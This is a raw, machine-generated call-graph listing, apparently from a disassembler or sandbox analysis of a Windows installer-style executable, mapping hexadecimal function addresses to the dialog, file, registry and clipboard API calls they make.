4459->4468 4464 40413a 4460->4464 4490 403ff6 WideCharToMultiByte 4460->4490 4461 404298 4462 4042a2 GetDlgItem 4461->4462 4463 40436a 4461->4463 4465 40432b 4462->4465 4466 4042bc 4462->4466 4470 403df6 8 API calls 4463->4470 4469 403d6b 19 API calls 4464->4469 4465->4463 4476 40433d 4465->4476 4466->4465 4475 4042e2 6 API calls 4466->4475 4468->4461 4468->4463 4471 404267 GetDlgItem SendMessageW 4468->4471 4473 40417a 4469->4473 4474 404365 4470->4474 4495 403db1 KiUserCallbackDispatcher 4471->4495 4478 403d6b 19 API calls 4473->4478 4475->4465 4479 404353 4476->4479 4480 404343 SendMessageW 4476->4480 4477 404293 4481 403d8d SendMessageW 4477->4481 4482 404187 CheckDlgButton 4478->4482 4479->4474 4483 404359 SendMessageW 4479->4483 4480->4479 4481->4461 4493 403db1 KiUserCallbackDispatcher 4482->4493 4483->4474 4485 4041a5 GetDlgItem 4494 403dc4 SendMessageW 4485->4494 4487 4041bb SendMessageW 4488 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4487->4488 4489 4041d8 GetSysColor 4487->4489 4488->4474 4489->4488 4491 404033 4490->4491 4492 404015 GlobalAlloc WideCharToMultiByte 4490->4492 4491->4464 4492->4491 4493->4485 4494->4487 4495->4477 4496 402ae4 4497 4030e3 4496->4497 4498 402aeb 4496->4498 4499 402af2 CloseHandle 4498->4499 4499->4497 4500 402065 4501 401446 18 API calls 4500->4501 4502 40206d 4501->4502 4503 401446 18 API calls 4502->4503 4504 402076 GetDlgItem 4503->4504 4505 4030dc 4504->4505 4506 4030e3 4505->4506 4508 405f7d wsprintfW 4505->4508 4508->4506 4509 402665 4510 40145c 18 API calls 4509->4510 4511 40266b 4510->4511 4512 40145c 18 API calls 4511->4512 4513 402674 4512->4513 4514 40145c 18 API calls 4513->4514 4515 40267d 4514->4515 4516 4062cf 11 API calls 4515->4516 4517 40268c 4516->4517 4518 406301 2 API calls 4517->4518 4519 402695 4518->4519 4520 4026a6 lstrlenW lstrlenW 4519->4520 4521 404f9e 25 API calls 4519->4521 4524 4030e3 4519->4524 4522 404f9e 25 API calls 4520->4522 4521->4519 4523 4026e8 SHFileOperationW 4522->4523 4523->4519 4523->4524 4525 401c69 4526 40145c 18 API calls 4525->4526 4527 401c70 4526->4527 4528 4062cf 11 API calls 4527->4528 4529 401c80 4528->4529 4530 405ccc MessageBoxIndirectW 4529->4530 4531 401a13 4530->4531 4532 402f6e 4533 402f72 4532->4533 4534 402fae 4532->4534 4535 4062cf 11 API calls 4533->4535 4536 40145c 18 API calls 4534->4536 4537 402f7d 4535->4537 4540 402f9d 4536->4540 4538 4062cf 11 API calls 4537->4538 4539 402f90 4538->4539 4541 402fa2 4539->4541 4542 402f98 4539->4542 4544 406113 9 API calls 4541->4544 4543 403ea0 5 API calls 4542->4543 4543->4540 4544->4540 4545 4023f0 4546 402403 4545->4546 4547 4024da 4545->4547 4548 40145c 18 API calls 4546->4548 4549 404f9e 25 API calls 4547->4549 4550 40240a 4548->4550 4553 4024f1 4549->4553 4551 40145c 18 API calls 4550->4551 4552 402413 4551->4552 4554 402429 LoadLibraryExW 4552->4554 4555 40241b GetModuleHandleW 4552->4555 4556 40243e 4554->4556 4557 4024ce 4554->4557 4555->4554 4555->4556 4569 406391 GlobalAlloc WideCharToMultiByte 4556->4569 4558 404f9e 25 API calls 4557->4558 4558->4547 4560 402449 4561 40248c 4560->4561 4562 40244f 4560->4562 4563 404f9e 25 API calls 4561->4563 4565 401435 25 API calls 4562->4565 4567 40245f 4562->4567 4564 402496 4563->4564 4566 4062cf 11 API calls 4564->4566 4565->4567 4566->4567 4567->4553 4568 4024c0 FreeLibrary 4567->4568 4568->4553 4570 4063c9 GlobalFree 4569->4570 4571 4063bc GetProcAddress 4569->4571 4570->4560 4571->4570 3382 402175 3392 401446 3382->3392 3384 40217c 3385 401446 18 API calls 3384->3385 3386 402186 3385->3386 3387 402197 3386->3387 3388 4062cf 11 API calls 3386->3388 3389 4021aa EnableWindow 3387->3389 3390 40219f ShowWindow 3387->3390 3388->3387 3391 4030e3 3389->3391 3390->3391 3393 406831 18 API calls 3392->3393 3394 401455 3393->3394 3394->3384 4572 4048f8 4573 404906 4572->4573 4574 40491d 4572->4574 4575 40490c 4573->4575 4590 404986 4573->4590 4576 40492b IsWindowVisible 4574->4576 4582 404942 4574->4582 4577 403ddb SendMessageW 4575->4577 4579 404938 4576->4579 4576->4590 4580 404916 4577->4580 4578 40498c CallWindowProcW 4578->4580 4591 40487a SendMessageW 4579->4591 4582->4578 4596 406035 lstrcpynW 4582->4596 4584 404971 4597 405f7d wsprintfW 4584->4597 4586 404978 4587 40141d 80 API calls 4586->4587 4588 40497f 4587->4588 4598 406035 lstrcpynW 4588->4598 4590->4578 4592 4048d7 SendMessageW 4591->4592 4593 40489d GetMessagePos ScreenToClient SendMessageW 4591->4593 4595 4048cf 4592->4595 4594 4048d4 4593->4594 4593->4595 4594->4592 4595->4582 4596->4584 4597->4586 4598->4590 3687 4050f9 3688 4052c1 3687->3688 3689 40511a GetDlgItem GetDlgItem GetDlgItem 3687->3689 3691 4052f2 3688->3691 3692 4052ca GetDlgItem CreateThread CloseHandle 3688->3692 3736 403dc4 SendMessageW 3689->3736 3693 405320 3691->3693 3694 405342 3691->3694 3695 40530c ShowWindow ShowWindow 3691->3695 3692->3691 3739 405073 OleInitialize 3692->3739 3696 405331 3693->3696 3697 405357 ShowWindow 3693->3697 3700 40537e 3693->3700 3698 403df6 8 API calls 3694->3698 3738 403dc4 SendMessageW 3695->3738 3702 403d44 SendMessageW 3696->3702 3704 405377 3697->3704 3705 405369 3697->3705 3703 4052ba 3698->3703 3699 40518e 3706 406831 18 API calls 3699->3706 3700->3694 3707 405389 SendMessageW 3700->3707 3702->3694 3710 403d44 SendMessageW 3704->3710 3708 404f9e 25 API calls 3705->3708 3709 4051ad 3706->3709 3707->3703 3711 4053a2 CreatePopupMenu 3707->3711 3708->3704 3712 4062cf 11 API calls 3709->3712 3710->3700 3713 406831 18 API calls 3711->3713 3715 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3712->3715 3714 4053b2 AppendMenuW 3713->3714 3716 4053c5 GetWindowRect 3714->3716 3717 4053d8 3714->3717 3718 405203 SendMessageW SendMessageW 3715->3718 3719 40521f 3715->3719 3720 4053df TrackPopupMenu 3716->3720 3717->3720 3718->3719 3721 405232 3719->3721 3722 405224 SendMessageW 3719->3722 3720->3703 3723 4053fd 3720->3723 3724 403d6b 19 API calls 3721->3724 3722->3721 3726 405419 SendMessageW 3723->3726 3725 405242 3724->3725 3727 40524b ShowWindow 3725->3727 3728 40527f GetDlgItem SendMessageW 3725->3728 3726->3726 3729 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3726->3729 3730 405261 ShowWindow 3727->3730 3731 40526e 3727->3731 3728->3703 3732 4052a2 SendMessageW SendMessageW 3728->3732 3733 40545b SendMessageW 3729->3733 3730->3731 3737 403dc4 SendMessageW 3731->3737 3732->3703 3733->3733 3734 405486 GlobalUnlock SetClipboardData CloseClipboard 3733->3734 3734->3703 3736->3699 3737->3728 3738->3693 3740 403ddb SendMessageW 3739->3740 3744 405096 3740->3744 3741 403ddb SendMessageW 3742 4050d1 OleUninitialize 3741->3742 3743 4062cf 11 API calls 3743->3744 3744->3743 3745 40139d 80 API calls 3744->3745 3746 4050c1 3744->3746 3745->3744 3746->3741 4599 4020f9 GetDC GetDeviceCaps 4600 401446 18 API calls 4599->4600 4601 402116 MulDiv 4600->4601 4602 401446 18 API calls 4601->4602 4603 40212c 4602->4603 4604 406831 18 API calls 4603->4604 4605 402165 CreateFontIndirectW 4604->4605 4606 4030dc 4605->4606 4607 4030e3 4606->4607 4609 405f7d wsprintfW 4606->4609 4609->4607 4610 4024fb 4611 40145c 18 API calls 4610->4611 4612 402502 4611->4612 4613 40145c 18 API calls 4612->4613 4614 40250c 4613->4614 4615 40145c 18 API calls 4614->4615 4616 402515 4615->4616 4617 40145c 18 API calls 4616->4617 4618 40251f 4617->4618 4619 40145c 18 API calls 4618->4619 4620 402529 4619->4620 4621 40253d 4620->4621 4623 40145c 18 API calls 4620->4623 4622 4062cf 11 API calls 4621->4622 4624 40256a CoCreateInstance 4622->4624 4623->4621 4625 40258c 4624->4625 4626 4026fc 4628 402708 4626->4628 4629 401ee4 4626->4629 4627 406831 18 API calls 4627->4629 4629->4626 4629->4627 3773 4019fd 3774 40145c 18 API calls 3773->3774 3775 401a04 3774->3775 3778 405eab 3775->3778 3779 405eb8 GetTickCount GetTempFileNameW 3778->3779 3780 401a0b 3779->3780 3781 405eee 3779->3781 3781->3779 3781->3780 4630 4022fd 4631 40145c 18 API calls 4630->4631 4632 402304 GetFileVersionInfoSizeW 4631->4632 4633 4030e3 4632->4633 4634 40232b GlobalAlloc 4632->4634 4634->4633 4635 40233f GetFileVersionInfoW 4634->4635 4636 402350 VerQueryValueW 4635->4636 4637 402381 GlobalFree 4635->4637 4636->4637 4638 402369 4636->4638 4637->4633 4643 405f7d wsprintfW 4638->4643 4641 402375 4644 405f7d wsprintfW 4641->4644 4643->4641 4644->4637 4645 402afd 4646 40145c 18 API calls 4645->4646 4647 402b04 4646->4647 4652 405e7c GetFileAttributesW CreateFileW 4647->4652 4649 402b10 4650 4030e3 4649->4650 4653 405f7d wsprintfW 4649->4653 4652->4649 4653->4650 4654 4029ff 4655 401553 19 API calls 4654->4655 4656 402a09 4655->4656 4657 40145c 18 API calls 4656->4657 4658 402a12 4657->4658 4659 402a1f RegQueryValueExW 4658->4659 4663 401a13 4658->4663 4660 402a45 4659->4660 4661 402a3f 4659->4661 4660->4663 4664 4029e4 RegCloseKey 4660->4664 4661->4660 4665 405f7d wsprintfW 4661->4665 4664->4663 4665->4660 4666 401000 4667 401037 BeginPaint GetClientRect 4666->4667 4668 40100c DefWindowProcW 4666->4668 4670 4010fc 4667->4670 4671 401182 4668->4671 4672 401073 CreateBrushIndirect FillRect DeleteObject 4670->4672 4673 401105 4670->4673 4672->4670 4674 401170 EndPaint 4673->4674 4675 40110b CreateFontIndirectW 4673->4675 4674->4671 4675->4674 4676 40111b 6 API calls 4675->4676 4676->4674 4677 401f80 4678 401446 18 API calls 4677->4678 4679 401f88 4678->4679 4680 401446 18 API calls 4679->4680 4681 401f93 4680->4681 4682 401fa3 4681->4682 4684 40145c 18 API calls 4681->4684 4683 401fb3 4682->4683 4685 40145c 18 API calls 4682->4685 4686 402006 4683->4686 4687 401fbc 4683->4687 4684->4682 4685->4683 4689 40145c 18 API calls 4686->4689 4688 401446 18 API calls 4687->4688 4690 401fc4 4688->4690 4691 40200d 4689->4691 4692 401446 18 API calls 4690->4692 4693 40145c 18 API calls 4691->4693 4695 401fce 4692->4695 4694 402016 FindWindowExW 4693->4694 4699 402036 4694->4699 4696 401ff6 SendMessageW 4695->4696 4697 401fd8 SendMessageTimeoutW 4695->4697 4696->4699 4697->4699 4698 4030e3 4699->4698 4701 405f7d wsprintfW 4699->4701 4701->4698 4702 402880 4703 402884 4702->4703 4704 40145c 18 API calls 4703->4704 4705 4028a7 4704->4705 4706 40145c 18 API calls 4705->4706 4707 4028b1 4706->4707 4708 4028ba RegCreateKeyExW 4707->4708 4709 4028e8 4708->4709 4711 4029ef 4708->4711 4710 40145c 18 API calls 4709->4710 4713 402934 4709->4713 4714 4028fc lstrlenW 4710->4714 4712 402963 4716 4029ae RegSetValueExW 4712->4716 4717 40337f 33 API calls 4712->4717 4713->4712 4715 401446 18 API calls 4713->4715 4718 402918 4714->4718 4719 40292a 4714->4719 4722 402947 4715->4722 4720 4029c6 RegCloseKey 4716->4720 4721 4029cb 4716->4721 4723 40297b 4717->4723 4724 4062cf 11 API calls 4718->4724 4725 4062cf 11 API calls 4719->4725 4720->4711 4726 4062cf 11 API calls 4721->4726 4727 4062cf 11 API calls 4722->4727 4733 406250 4723->4733 4729 402922 4724->4729 4725->4713 4726->4720 4727->4712 4729->4716 4732 4062cf 11 API calls 4732->4729 4734 406273 4733->4734 4735 4062b6 4734->4735 4736 406288 wsprintfW 4734->4736 4737 402991 4735->4737 4738 4062bf lstrcatW 4735->4738 4736->4735 4736->4736 4737->4732 4738->4737 4739 403d02 4740 403d0d 4739->4740 4741 403d14 GlobalAlloc 4740->4741 4742 403d11 4740->4742 4741->4742 4743 402082 4744 401446 18 API calls 4743->4744 4745 402093 SetWindowLongW 4744->4745 4746 4030e3 4745->4746 4747 402a84 4748 401553 19 API calls 4747->4748 4749 402a8e 4748->4749 4750 401446 18 API calls 4749->4750 4751 402a98 4750->4751 4752 401a13 4751->4752 4753 402ab2 RegEnumKeyW 4751->4753 4754 402abe RegEnumValueW 4751->4754 4755 402a7e 4753->4755 4754->4752 4754->4755 4755->4752 4756 4029e4 RegCloseKey 4755->4756 4756->4752 4757 402c8a 4758 402ca2 4757->4758 4759 402c8f 4757->4759 4761 40145c 18 API calls 4758->4761 4760 401446 18 API calls 4759->4760 4762 402c97 4760->4762 4763 402ca9 lstrlenW 4761->4763 4764 401a13 4762->4764 4765 402ccb WriteFile 4762->4765 4763->4762 4765->4764 4766 401d8e 4767 40145c 18 API calls 4766->4767 4768 401d95 ExpandEnvironmentStringsW 4767->4768 4769 401da8 4768->4769 4770 401db9 4768->4770 4769->4770 4771 401dad lstrcmpW 4769->4771 4771->4770 4772 401e0f 4773 401446 18 API calls 4772->4773 4774 401e17 4773->4774 4775 401446 18 API calls 4774->4775 4776 401e21 4775->4776 4777 4030e3 4776->4777 4779 405f7d wsprintfW 4776->4779 4779->4777 4780 40438f 4781 4043c8 4780->4781 4782 40439f 4780->4782 4784 403df6 8 API calls 4781->4784 4783 403d6b 19 API calls 4782->4783 4785 4043ac SetDlgItemTextW 4783->4785 4786 4043d4 4784->4786 4785->4781 4787 403f90 4788 403fa0 4787->4788 4789 403fbc 4787->4789 4798 405cb0 GetDlgItemTextW 4788->4798 4790 403fc2 SHGetPathFromIDListW 4789->4790 4791 403fef 4789->4791 4793 403fd2 4790->4793 4797 403fd9 SendMessageW 4790->4797 4795 40141d 80 API calls 4793->4795 4794 403fad SendMessageW 4794->4789 4795->4797 4797->4791 4798->4794 4799 402392 4800 40145c 18 API calls 4799->4800 4801 402399 4800->4801 4804 407224 4801->4804 4805 406efe 25 API calls 4804->4805 4806 407244 4805->4806 4807 4023a7 4806->4807 4808 40724e lstrcpynW lstrcmpW 4806->4808 4809 407280 4808->4809 4810 407286 lstrcpynW 4808->4810 4809->4810 4810->4807 3303 402713 3318 406035 lstrcpynW 3303->3318 3305 40272c 3319 406035 lstrcpynW 3305->3319 3307 402738 3308 402743 3307->3308 3309 40145c 18 API calls 3307->3309 3310 402752 3308->3310 3312 40145c 18 API calls 3308->3312 3309->3308 3311 402761 3310->3311 3313 40145c 18 API calls 3310->3313 3320 40145c 3311->3320 3312->3310 3313->3311 3318->3305 3319->3307 3328 406831 3320->3328 3323 401497 3325 4062cf lstrlenW wvsprintfW 3323->3325 3368 406113 3325->3368 3341 40683e 3328->3341 3329 406aab 3330 401488 3329->3330 3363 406035 lstrcpynW 3329->3363 3330->3323 3347 406064 3330->3347 3332 4068ff GetVersion 3342 40690c 3332->3342 3333 406a72 lstrlenW 3333->3341 3336 406831 10 API calls 3336->3333 3337 40697e GetSystemDirectoryW 3337->3342 3339 406991 GetWindowsDirectoryW 3339->3342 3340 406064 5 API calls 3340->3341 3341->3329 3341->3332 3341->3333 3341->3336 3341->3340 3361 405f7d wsprintfW 3341->3361 3362 406035 lstrcpynW 3341->3362 3342->3337 3342->3339 3342->3341 3343 4069c5 SHGetSpecialFolderLocation 3342->3343 3344 406831 10 API calls 3342->3344 3345 406a0b lstrcatW 3342->3345 3356 405eff RegOpenKeyExW 3342->3356 3343->3342 3346 4069dd SHGetPathFromIDListW CoTaskMemFree 3343->3346 3344->3342 3345->3341 3346->3342 3354 406071 3347->3354 3348 4060e7 3349 4060ed CharPrevW 3348->3349 3352 40610d 3348->3352 3349->3348 3350 4060da CharNextW 3350->3348 3350->3354 3352->3323 3353 4060c6 CharNextW 3353->3354 3354->3348 3354->3350 3354->3353 3355 4060d5 CharNextW 3354->3355 3364 405d32 3354->3364 3355->3350 3357 405f33 RegQueryValueExW 3356->3357 3358 405f78 3356->3358 3359 405f55 RegCloseKey 3357->3359 3358->3342 3359->3358 3361->3341 3362->3341 3363->3330 3365 405d38 3364->3365 3366 405d4e 3365->3366 3367 405d3f CharNextW 3365->3367 3366->3354 3367->3365 3369 40613c 3368->3369 3370 40611f 3368->3370 3371 40277f WritePrivateProfileStringW 3369->3371 3373 4061b3 3369->3373 3374 406159 3369->3374 3370->3371 3372 406129 CloseHandle 3370->3372 3372->3371 3373->3371 3376 4061bc lstrcatW lstrlenW WriteFile 3373->3376 3375 406162 GetFileAttributesW 3374->3375 3374->3376 3381 405e7c GetFileAttributesW CreateFileW 3375->3381 3376->3371 3378 40617e 3378->3371 3379 4061a8 SetFilePointer 3378->3379 3380 40618e WriteFile 3378->3380 3379->3373 3380->3379 3381->3378 4811 402797 4812 40145c 18 API calls 4811->4812 4813 4027ae 4812->4813 4814 40145c 18 API calls 4813->4814 4815 4027b7 4814->4815 4816 40145c 18 API calls 4815->4816 4817 4027c0 GetPrivateProfileStringW lstrcmpW 4816->4817 4818 401e9a 4819 40145c 18 API calls 4818->4819 4820 401ea1 4819->4820 4821 401446 18 API calls 4820->4821 4822 401eab wsprintfW 4821->4822 3782 401a1f 3783 40145c 18 API calls 3782->3783 3784 401a26 3783->3784 3785 4062cf 11 API calls 3784->3785 3786 401a49 3785->3786 3787 401a64 3786->3787 3788 401a5c 3786->3788 3857 406035 lstrcpynW 3787->3857 3856 406035 lstrcpynW 3788->3856 3791 401a62 3795 406064 5 API calls 3791->3795 3792 401a6f 3858 40674e lstrlenW CharPrevW 3792->3858 3827 401a81 3795->3827 3796 406301 2 API calls 3796->3827 3799 401a98 CompareFileTime 3799->3827 3800 401ba9 3801 404f9e 25 API calls 3800->3801 3803 401bb3 3801->3803 3802 401b5d 3805 404f9e 25 API calls 3802->3805 3835 40337f 3803->3835 3804 4062cf 11 API calls 3804->3827 3806 401b70 3805->3806 3809 4062cf 11 API calls 3806->3809 3817 401b8b 3809->3817 3810 4062cf 11 API calls 3811 401bda 3810->3811 3813 401be9 SetFileTime 3811->3813 3814 401bf8 CloseHandle 3811->3814 3812 406035 lstrcpynW 3812->3827 3813->3814 3816 401c09 3814->3816 3814->3817 3815 406831 18 API calls 3815->3827 3818 401c21 3816->3818 3819 401c0e 3816->3819 3821 406831 18 API calls 3818->3821 3820 406831 18 API calls 3819->3820 3823 401c16 lstrcatW 3820->3823 3824 401c29 3821->3824 3823->3824 3825 4062cf 11 API calls 3824->3825 3828 401c34 3825->3828 3826 401b50 3829 401b93 3826->3829 3830 401b53 3826->3830 3827->3796 3827->3799 3827->3800 3827->3802 3827->3804 3827->3812 3827->3815 3827->3826 3834 405e7c GetFileAttributesW CreateFileW 3827->3834 3861 405e5c GetFileAttributesW 3827->3861 3864 405ccc 3827->3864 3831 405ccc MessageBoxIndirectW 3828->3831 3832 4062cf 11 API calls 3829->3832 3833 4062cf 11 API calls 3830->3833 3831->3817 3832->3817 3833->3802 3834->3827 3837 40339a 3835->3837 3836 4033c7 3868 403336 ReadFile 3836->3868 3837->3836 3870 403368 SetFilePointer 3837->3870 3841 403546 3843 40354a 3841->3843 3848 40356e 3841->3848 3842 4033eb GetTickCount 3844 401bc6 3842->3844 3852 403438 3842->3852 3845 403336 ReadFile 3843->3845 3844->3810 3845->3844 3846 403336 ReadFile 3846->3852 3847 403336 ReadFile 3847->3848 3848->3844 3848->3847 3849 40358d WriteFile 3848->3849 3849->3844 3850 4035a1 3849->3850 3850->3844 3850->3848 3851 40348a GetTickCount 3851->3852 3852->3844 3852->3846 3852->3851 3853 4034af MulDiv wsprintfW 3852->3853 3855 4034f3 WriteFile 3852->3855 3854 404f9e 25 API calls 3853->3854 3854->3852 3855->3844 3855->3852 3856->3791 3857->3792 3859 401a75 lstrcatW 3858->3859 3860 40676b lstrcatW 3858->3860 3859->3791 3860->3859 3862 405e79 3861->3862 3863 405e6b SetFileAttributesW 3861->3863 3862->3827 3863->3862 3865 405ce1 3864->3865 3866 405d2f 3865->3866 3867 405cf7 MessageBoxIndirectW 3865->3867 3866->3827 3867->3866 3869 403357 3868->3869 3869->3841 3869->3842 3869->3844 3870->3836 4823 40209f GetDlgItem GetClientRect 4824 40145c 18 API calls 4823->4824 4825 4020cf LoadImageW SendMessageW 4824->4825 4826 4030e3 4825->4826 4827 4020ed DeleteObject 4825->4827 4827->4826 4828 402b9f 4829 401446 18 API calls 4828->4829 4830 402ba7 4829->4830 4831 402bdf ReadFile 4830->4831 4833 402c06 MultiByteToWideChar 4830->4833 4834 402c3f 4830->4834 4835 402c4f 4830->4835 4836 402c3d 4830->4836 4840 402c4a 4830->4840 4831->4830 4831->4836 4832 401446 18 API calls 4832->4836 4833->4830 4833->4835 4841 405f7d wsprintfW 4834->4841 4835->4836 4838 402c6b SetFilePointer 4835->4838 4836->4832 4839 402d17 ReadFile 4836->4839 4836->4840 4838->4836 4839->4836 4841->4840 4842 402b23 GlobalAlloc 4843 402b39 4842->4843 4844 402b4b 4842->4844 4845 401446 18 API calls 4843->4845 4846 40145c 18 API calls 4844->4846 4847 402b41 4845->4847 4848 402b52 WideCharToMultiByte lstrlenA 4846->4848 4849 402b93 4847->4849 4850 402b84 WriteFile 4847->4850 4848->4847 4850->4849 4851 402384 GlobalFree 4850->4851 4851->4849 4853 4040a3 4854 4040b0 lstrcpynW lstrlenW 4853->4854 4855 4040ad 4853->4855 4855->4854 3395 4054a5 3396 4055f9 3395->3396 3397 4054bd 3395->3397 3399 40564a 3396->3399 3400 40560a GetDlgItem GetDlgItem 3396->3400 3397->3396 3398 4054c9 3397->3398 3401 4054d4 SetWindowPos 3398->3401 3402 4054e7 3398->3402 3404 4056a4 3399->3404 3412 40139d 80 API calls 3399->3412 3403 403d6b 19 API calls 3400->3403 3401->3402 3406 405504 3402->3406 3407 4054ec ShowWindow 3402->3407 3408 405634 SetClassLongW 3403->3408 3413 4055f4 3404->3413 3465 403ddb 3404->3465 3409 405526 3406->3409 3410 40550c DestroyWindow 3406->3410 3407->3406 3411 40141d 80 API calls 3408->3411 3415 40552b SetWindowLongW 3409->3415 3416 40553c 3409->3416 3414 405908 3410->3414 3411->3399 3417 40567c 3412->3417 3414->3413 3424 405939 ShowWindow 3414->3424 3415->3413 3420 4055e5 3416->3420 3421 405548 GetDlgItem 3416->3421 3417->3404 3422 405680 SendMessageW 3417->3422 3418 40141d 80 API calls 3435 4056b6 3418->3435 3419 40590a DestroyWindow KiUserCallbackDispatcher 3419->3414 3485 403df6 3420->3485 3425 405578 3421->3425 3426 40555b SendMessageW IsWindowEnabled 3421->3426 3422->3413 3424->3413 3428 405585 3425->3428 3429 4055cc SendMessageW 3425->3429 3430 405598 3425->3430 3439 40557d 3425->3439 3426->3413 3426->3425 3427 406831 18 API calls 3427->3435 3428->3429 3428->3439 3429->3420 3432 4055a0 3430->3432 3433 4055b5 3430->3433 3479 40141d 3432->3479 3437 40141d 80 API calls 3433->3437 3434 4055b3 3434->3420 3435->3413 3435->3418 3435->3419 3435->3427 3438 403d6b 19 API calls 3435->3438 3456 40584a DestroyWindow 3435->3456 3468 403d6b 3435->3468 3440 4055bc 3437->3440 3438->3435 3482 403d44 3439->3482 3440->3420 3440->3439 3442 405731 GetDlgItem 3443 405746 3442->3443 3444 40574f ShowWindow KiUserCallbackDispatcher 3442->3444 3443->3444 3471 403db1 KiUserCallbackDispatcher 3444->3471 3446 405779 EnableWindow 3449 40578d 3446->3449 3447 405792 GetSystemMenu EnableMenuItem SendMessageW 3448 4057c2 SendMessageW 3447->3448 3447->3449 3448->3449 3449->3447 3472 403dc4 SendMessageW 3449->3472 3473 406035 lstrcpynW 3449->3473 3452 4057f0 lstrlenW 3453 406831 18 API calls 3452->3453 3454 405806 SetWindowTextW 3453->3454 3474 40139d 3454->3474 3456->3414 3457 405864 CreateDialogParamW 3456->3457 3457->3414 3458 405897 3457->3458 3459 403d6b 19 API calls 3458->3459 3460 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3459->3460 3461 40139d 80 API calls 3460->3461 3462 4058e8 3461->3462 3462->3413 3463 4058f0 ShowWindow 3462->3463 3464 403ddb SendMessageW 3463->3464 3464->3414 3466 403df3 3465->3466 3467 403de4 SendMessageW 3465->3467 3466->3435 3467->3466 3469 406831 18 API calls 3468->3469 3470 403d76 SetDlgItemTextW 3469->3470 3470->3442 3471->3446 3472->3449 3473->3452 3477 4013a4 3474->3477 3475 401410 3475->3435 3477->3475 3478 4013dd MulDiv SendMessageW 3477->3478 3499 4015a0 3477->3499 3478->3477 3480 40139d 80 API calls 3479->3480 3481 401432 3480->3481 3481->3439 3483 403d51 SendMessageW 3482->3483 3484 403d4b 3482->3484 3483->3434 3484->3483 3486 403e0b GetWindowLongW 3485->3486 3496 403e94 3485->3496 3487 403e1c 3486->3487 3486->3496 3488 403e2b GetSysColor 3487->3488 3489 403e2e 3487->3489 3488->3489 3490 403e34 SetTextColor 3489->3490 3491 403e3e SetBkMode 3489->3491 3490->3491 3492 403e56 GetSysColor 3491->3492 3493 403e5c 3491->3493 3492->3493 3494 403e63 SetBkColor 3493->3494 3495 403e6d 3493->3495 3494->3495 3495->3496 3497 403e80 DeleteObject 3495->3497 3498 403e87 CreateBrushIndirect 3495->3498 3496->3413 3497->3498 3498->3496 3500 4015fa 3499->3500 3524 40160c 3499->3524 3501 401601 3500->3501 3502 401742 3500->3502 3503 401962 3500->3503 3504 4019ca 3500->3504 3505 40176e 3500->3505 3506 4017b1 3500->3506 3507 401672 3500->3507 3508 401693 3500->3508 3509 401616 3500->3509 3510 401897 3500->3510 3511 4018db 3500->3511 3512 40163c 3500->3512 3513 4016bd 3500->3513 3523 4016d6 3500->3523 3500->3524 3526 401736 3500->3526 3529 401650 3500->3529 3518 4062cf 11 API calls 3501->3518 3527 401751 ShowWindow 3502->3527 3528 401758 3502->3528 3515 40145c 18 API calls 3503->3515 3522 40145c 18 API calls 3504->3522 3530 40145c 18 API calls 3505->3530 3516 40145c 18 API calls 3506->3516 3531 40145c 18 API calls 3507->3531 3517 401446 18 API calls 3508->3517 3521 40145c 18 API calls 3509->3521 3514 40145c 18 API calls 3510->3514 3519 40145c 18 API calls 3511->3519 3512->3524 3525 401647 PostQuitMessage 3512->3525 3520 4062cf 11 API calls 3513->3520 3533 40189d 3514->3533 3534 401968 GetFullPathNameW 3515->3534 3535 4017b8 3516->3535 3536 40169a 3517->3536 3518->3524 3537 4018e2 3519->3537 3538 4016c7 SetForegroundWindow 3520->3538 3539 40161c 3521->3539 3540 4019d1 SearchPathW 3522->3540 3523->3524 3541 401446 18 API calls 3523->3541 3524->3477 3525->3524 3526->3524 3633 405f7d wsprintfW 3526->3633 3527->3528 3528->3524 3542 401765 ShowWindow 3528->3542 3553 4062cf 11 API calls 3529->3553 3543 401775 3530->3543 3532 401678 3531->3532 3544 4062cf 11 API calls 3532->3544 3624 406301 FindFirstFileW 3533->3624 3546 4019a1 3534->3546 3547 40197f 3534->3547 3549 4062cf 11 API calls 3535->3549 3550 4062cf 11 API calls 3536->3550 3551 40145c 18 API calls 3537->3551 3538->3524 3552 4062cf 11 API calls 3539->3552 3540->3524 3540->3526 3541->3524 3542->3524 3554 4062cf 11 API calls 3543->3554 3555 401683 3544->3555 3546->3524 3568 4019b8 GetShortPathNameW 3546->3568 3547->3546 3575 406301 2 API calls 3547->3575 3557 4017c9 3549->3557 3558 4016a7 Sleep 3550->3558 3559 4018eb 3551->3559 3560 401627 3552->3560 3561 401664 3553->3561 3562 401785 SetFileAttributesW 3554->3562 3573 404f9e 25 API calls 3555->3573 3606 405d85 CharNextW CharNextW 3557->3606 3558->3524 3569 40145c 18 API calls 3559->3569 3570 404f9e 25 API calls 3560->3570 3571 40139d 65 API calls 3561->3571 3562->3524 3563 40179a 3562->3563 3572 4062cf 11 API calls 3563->3572 3564 4018c2 3576 4062cf 11 API calls 3564->3576 3565 4018a9 3574 4062cf 11 API calls 3565->3574 3568->3524 3577 4018f5 3569->3577 3570->3524 3571->3524 3572->3524 3573->3524 3574->3524 3578 401991 3575->3578 3576->3524 3580 4062cf 11 API calls 3577->3580 3578->3546 3632 406035 lstrcpynW 3578->3632 3579 401864 3579->3555 3583 40186e 3579->3583 3582 401902 MoveFileW 3580->3582 3581 405d32 CharNextW 3585 4017e6 CreateDirectoryW 3581->3585 3586 401912 3582->3586 3587 40191e 3582->3587 3612 404f9e 3583->3612 3589 4017fe GetLastError 3585->3589 3601 4017d4 3585->3601 3586->3555 3590 401942 3587->3590 3594 406301 2 API calls 3587->3594 3592 401827 GetFileAttributesW 3589->3592 3593 40180b GetLastError 3589->3593 3596 4062cf 11 API calls 3590->3596 3592->3601 3597 4062cf 11 API calls 3593->3597 3598 401929 3594->3598 3600 40195c 3596->3600 3597->3601 3598->3590 3627 406c94 3598->3627 3599 401882 SetCurrentDirectoryW 3599->3524 3600->3524 3601->3579 3601->3581 3602 4062cf 11 API calls 3601->3602 3602->3601 3605 404f9e 25 API calls 3605->3590 3607 405da2 3606->3607 3609 405db4 3606->3609 3608 405daf CharNextW 3607->3608 3607->3609 3611 405dd8 3608->3611 3610 405d32 CharNextW 3609->3610 3609->3611 3610->3609 3611->3601 3613 404fb7 3612->3613 3614 401875 3612->3614 3615 404fd5 lstrlenW 3613->3615 3616 406831 18 API calls 3613->3616 3623 406035 lstrcpynW 3614->3623 3617 404fe3 lstrlenW 3615->3617 3618 404ffe 3615->3618 